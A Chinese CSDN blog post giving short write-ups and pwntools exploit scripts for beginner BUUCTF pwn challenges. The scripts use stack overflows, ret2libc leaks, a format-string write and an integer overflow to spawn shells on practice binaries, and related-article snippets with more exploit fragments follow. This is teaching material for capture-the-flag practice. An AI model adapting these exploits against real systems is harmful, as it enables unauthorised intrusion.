BUUCTF pwn水题大赏(一)

最新推荐文章于 2024-07-04 23:51:12 发布
最新推荐文章于 2024-07-04 23:51:12 发布
阅读量314 收藏 1
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45878152/article/details/113605846
版权

BUUCTF pwn水题大赏

test_your_nc

nc 上去,然后 cat flag

rip

gets 栈溢出到 /bin/sh
exp:

from pwn import*
#p=process('./pwn1')
p=remote('node3.buuoj.cn',25250)
payload='a'*0xf+'a'*8+p64(0x40118a)
p.sendline(payload)
p.interactive()

warmup_csaw_2016

gets 栈溢出到 sub_40060D
exp:

from pwn import*
p=process('./warmup_csaw_2016')
#p=remote('node3.buuoj.cn',27740)
payload='a'*0x48+p64(0x40060d)
p.sendline(payload)
p.interactive()

pwn1_sctf_2016

c++题目,当输入 i 时会被替换成 you ,输入 20i 就可以溢出到 get_flag
exp:

from pwn import *
p=process('./pwn1_sctf_2016')
#p=remote('node3.buuoj.cn',)
payload='I'*20+'a'*4+p64(0x08048F0D)
p.sendline(payload)
p.interactive()

ciscn_2019_n_1

gets 栈溢出绕过 if
exp:

from pwn import*
p=process('./ciscn_2019_n_1')
#p=remote('node3.buuoj.cn',27504)
payload='a'*0x30+'a'*8+p64(0x4006be)
p.sendline(payload)
p.interactive()

jarvisoj_level0

栈溢出到 callsystem 函数(要用 ret 将栈对齐)
exp:

from pwn import*
p=process('./level0')
#p=remote('node3.buuoj.cn',29842)
ret = 0x0000000000400431
payload='a'*0x88+p64(ret)+p64(0x0400596)
p.sendline(payload)
p.interactive()

ciscn_2019_c_1

puts 泄露 libcgets 栈溢出
exp:

from pwn import*
p=process('./ciscn_2019_c_1')
#p=remote('node3.buuoj.cn',28840)
context.log_level = 'debug'
ret=0x00000000004006b9
pop_rdi=0x0000000000400c83
elf=ELF('./ciscn_2019_c_1')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_plt = elf.sym['main']

payload='a'*0x50+'a'*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_plt)
p.sendlineafter("choice!",'1')
p.sendline(payload)

puts_addr=u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
print hex(puts_addr)

libc_base=puts_addr-0x080a30
print hex(libc_base)
libc_sys=libc_base+0x04f4e0
libc_sh=libc_base+0x1b40fa

p.sendlineafter("choice!",'1')
payload2='a'*0x50+'a'*8+p64(ret)+p64(pop_rdi)+p64(libc_sh)+p64(libc_sys)+p64(0)
p.sendline(payload2)
p.interactive()

[OGeek2019]babyrop

write 泄露 libc\x00 绕过 strncmp
exp:

from pwn import*
from LibcSearcher import*
p=process('./pwn')
#p=remote('node3.buuoj.cn',28116)
elf=ELF('./pwn')
write_plt=elf.plt['write']
read_got=elf.got['read']
read_plt=elf.plt['read']
main_addr=0x8048825

payload1='\x00'+'\xff'*0x7
p.sendline(payload1)
p.recvuntil('Correct')

payload2='a'*0xe7+'b'*0x4+p32(write_plt)+p32(main_addr)+p32(1)+p32(read_got)+p32(0x8)
p.sendline(payload2)
read_addr=u32(r.recv(4))
print hex(read_addr)

libc=LibcSearcher('read',read_addr)
libc_base=read_addr-libc.dump('read')
system_addr=libc_base+libc.dump('system')
bin_sh_addr=libc_base+libc.dump('str_bin_sh')

p.sendline(payload1)
p.recvuntil('Correct')

payload3='a'*0xe7+'b'*0x4+p32(system_addr)*2+p32(bin_sh_addr)
p.sendline(payload3)

p.interactive()

[第五空间2019 决赛]PWN5

格式化字符串,偏移 10 ,将 unk_804C044 改成固定数值
exp:

from pwn import*
p=process('./pwn5')
#p=remote("node3.buuoj.cn",25955)
unk_804C044=0x0804C044
payload=p32(unk_804C044)+'%10$n'
p.sendlineafter('your name:',payload)
p.sendlineafter('your passwd:','4')
p.interactive()

[BJDCTF 2nd]r2t3

整数溢出
exp:

from pwn import*
p=process('./r2t3')
#p=remote('node3.buuoj.cn',28250)
p.recvuntil("name:")
payload=(0x11+0x4)*'a'+p32(0x0804858B)+'a'*235
p.sendline(payload)
p.interactive()
o琦野o
关注
专栏目录
攻防世界PWN进阶区(warmup)
BurYiA的博客
02-03 1544
warmup 这是一个没有附件的题,看起来题目是要求我们fuzz了 nc连接上后可以发现有个输入点,并且还给了我们一个十六进制数,看起来是个地址 那首先根据这些我们可以先将fuzz函数写出来,分三种情况(不用他给的地址,用p32发送,用p64送) def fuzz(r, num, flag): payload = 'a' * num if flag==1: pa...
BUUCTF pwn水题大赏(三)
o琦野o的博客
02-03 379
BUUCTF pwn水题大赏21.铁人三项(第五赛区)_2018_rop22.bjdctf_2020_babyrop23.[BJDCTF 2nd]r2t424.[BJDCTF 2nd]test25.bjdctf_2020_babystack226.bjdctf_2020_babyrop227.bjdctf_2020_router28.others_babystack29.ciscn_2019_s_430.wdb2018_guess 21.铁人三项(第五赛区)_2018_rop 32位栈溢出,利用 write
buuctf--pwn-warmup
weixin_45427676的博客
09-19 522
下载文件后首先查看保护机制,checksec发现没有开什么保护,64位程序,在IDA中打开查看程序流程 gets()函数很明显会有栈溢出漏洞,然后发现有后门函数,也就是sub_40060D函数,而且会发现你执行此程序的时候可以直接输出后门函数的地址,就不需要再找他的地址了 sprintf(&s, "%p\n", sub_40060D) 这个函数的意思就是将sub_40060D的地址放在s缓冲区中输出地址,所以执行的时候就可以直接看到后门函数地址。 所以现在的漏洞利用思路就是将v5缓冲区覆盖
BUUCTF PWN warmup_csaw_2016
Rt1Text的博客
04-22 409
1.checksec+运行 64位/没有保护 2.64位IDA进行 1.main 函数 明显的溢出函数gets() 跟进v5看看 offset = 0x40+8 shift+f12 真不错,cat flag.txt 找它的地址 3.上脚本 from pwn import* #p=process('./3warmup') p=remote("node4.buuoj.cn",28180) flag_addr=0x400611 payload=b'a'*(0...
buuctf warmup
doudoudedi
01-28 568
函数很少我们需要控制寄存器的值来执行内核调用(int 80) 思路 先将字符串/bin/sh写入程序32位的程序用栈传递参数所以我们有充足的空间进行ROP然后跳回程序开始然后将再次读入/bin/sh然后控制好寄存器的值即打开execve的系统调用(这里函数最后的ret会使栈向上提了4个byte所以寄存器控制好了)~~ exp: #!/usr/bin/python2 from pwn import ...
buuctf pwn warmup_csaw_2016
xieyichensss的博客
03-16 222
buuctf pwn warmup_csaw_2016 1.用checksec查看一下保护,保护都在关闭状态。 2.将文件拖入IDA64版本(在linux下用file命令查看是64位文件) 3.按fn+F5反汇编出现c的代码,发现return gets(v5),其是栈溢出的题目。 并且发现一个可疑函数sub_40060D 4.双击进去看发现flag文件。 5.去查看sub_40060D的地址是0x40060D。 6.由于char v5时有rbp-40h,则payload=b’a’*72+p64(0x400
BUUCTF pwn水题大赏(六)
o琦野o的博客
03-11 343
BUUCTF pwn水题大赏suctf_2018_stack suctf_2018_stack 最最最最最最基本的栈溢出,也不知道为啥会这么高分。 exp: from pwn import* context.log_level = 'DEBUG' p=remote('node3.buuoj.cn',28582) #p=process('./SUCTF_2018_stack') elf=ELF('./SUCTF_2018_stack') payload = 'a'*0x28+p64(0x0040067A)
BUUCTF pwn水题大赏(五)
o琦野o的博客
02-03 294
BUUCTF pwn水题大赏41.ciscn_2019_s_3 41.ciscn_2019_s_3 srop ,要注意 rsp 指向的位置。 exp: from pwn import* context.log_level = 'DEBUG' context.arch = 'amd64' p = remote('node3.buuoj.cn',29369) #p = process('./ciscn_s_3') elf = ELF('./ciscn_s_3') syscall_ret = 0x400517
BUUCTF pwn水题大赏(七)(更新中)
o琦野o的博客
04-02 173
BUUCTF pwn水题大赏wustctf2020_getshell wustctf2020_getshell 简单 32 位栈溢出。 exp: from pwn import* context.log_level = 'DEBUG' p=remote('node3.buuoj.cn',28411) #p=process('./wustctf2020_getshell') backdoor = 0x0804851B payload = 'a'*0x18+'a'*4+p32(backdoor) p.sen
BUUCTF PWN-堆题总结 2021-09-27
m0_56897090的博客
09-27 2070
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
[BUUCTF-PWN] warmup_csaw_2016
m0_46098032的博客
01-03 374
下载文件,checksec看一下,保护都没开,64位文件。 用IDA64打开文件,查看一下main函数。可以看到明显的栈溢出漏洞(gets)。 看一下v5,v5大小是 0x40, 返回地址是8 字节, 溢出大小就是0x48。 sub_40060D有点可疑,双击看一下。发现这里就是system函数,我们在构造pyaload的时候加上sub_40060D。 exp为: from pwn import * p = remote('node4.buuoj.cn', 2574...
[BUUCTF]PWN——[V&N2020 公开赛]warmup
mcmuyanga的博客
11-17 440
[V&N2020 公开赛]warmup 步骤: 例行检查,64位程序,除了canary,其他保护都开 本地运行一下,看看大概的情况 64位ida载入,从main函数开始看程序 看到程序将puts函数的地址泄露给了我们 sub_84D()函数里面是prctl函数的沙箱机制 可以利用seccomp-tools工具来查看一下限制了哪些函数 禁止了execve和fork syscall, 关于seccomp-tools工具的安装和使用看这篇文章,关于prctl函数可以看一下这篇文章
warmup【buuctf-pwn
m0_73756460的博客
07-17 224
warmup【buuctf-pwn
BUUCTF|PWN-warmup_csaw_2016-WP
l2645470582_的博客
07-28 471
1、下载文件并开启靶机 2、在Linux中查看该文件信息 checksec warmup_csaw_2016 3、我们看到该文件是64位的文件,我们用64位IDA打开该文件 3.1、shift+f12查看该文件的关键字符串 3.2、双击关键字符串,f5进入反编译代码区 查看main函数 3.3、我们看到s和v5字符数组,查看他们所占字节 v5有溢出: r(返回地址): 关键字符串函数地址 4、编译代码 #i...
pwn-warmup
醉等佳人归
09-08 213
1.题目 1.1.保护机制 不详 1.2.关键代码 没有提供代码 我们使用nc连接之后发现给了一个输入点和一个地址 2.思路 重点1:没有给代码,说明要我们使用fuzz 重点2:猜测给的地址是漏洞利用函数地址,应该可以通过栈溢出去调用, 重点3:所以我们fuzz的参数应该有两个,第一个是num即发送的字符串,第三个是flag即跟随的payload函数(0代表不跟随,1代表32位,2代表64位) from pwn import * from ctypes import * #context(arch="a
pwn_warmup
weixin_44464829的博客
10-31 381
这个题没有附件,只好nc服务器: 发现给了我们一个类似地址的东西,该怎么利用。 猜想flag应该就在这个地址,或者这个地址的附近。这里不得不提到一个方法叫做fuzz(模糊测试): Fuzzing是指通过构造测试输入,对软件进行大量测试来发现软件中的漏洞的一种模糊测试方法。在CTF中,fuzzing可能不常用,但在现实的漏洞挖掘中,fuzzing因其简单高效的优势,成为非常主流的漏洞挖掘方法。 所以额,我们要写一个函数,这个函数可以为我们生成很多地址,如果这个地址正确了,flag就会被我拿到 d
BUUCTF-PWN】3-warmup_csaw_2016
最新发布
燕麦葡萄干的博客
07-04 163
checksec检查是64位,未开启任何保护。直接字符串查找system或者flag。后门函数的地址是0x40060D。gets()函数存在栈溢出。
[BUUCTF]PWN3——warmup_csaw_2016
mcmuyanga的博客
08-24 1013
[BUUCTF]3——warmup_csaw_2016 题目网址:https://buuoj.cn/challenges#warmup_csaw_2016 步骤: 例行检查,64位,没有开启任何保护 nc一下,看看输入点的字符串,看到回显了一个地址,之后让我们输入,输入完之后就退出了 用64位ida打开附件,首先shift+f12查看程序里的字符串,可以看到有一个“cat flag.txt”字符串引人注目 双击字符串跟进,ctrl+x查看哪个函数调用了这个字符串,找到函数后按f5反编译成我们熟悉的伪代
vn_pwn_warmup(利用ret滑行到rop里)
seaaseesa的博客
04-09 453
vn_pwn_warmup 首先,检查一下程序的保护机制 程序开启了沙箱保护 禁用了execve调用。 然后我们用IDA分析一下,这里没有栈溢出。 然后,我们进入9A1这个函数 这里可以栈溢出,但是仅仅能溢出0x10个字节,显然是不够我们完成open、read、write操作的。 但是,由于该函数是在9D3函数里调用,因此,9A1函数的栈下方就是9D3的栈空间。因此我...
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值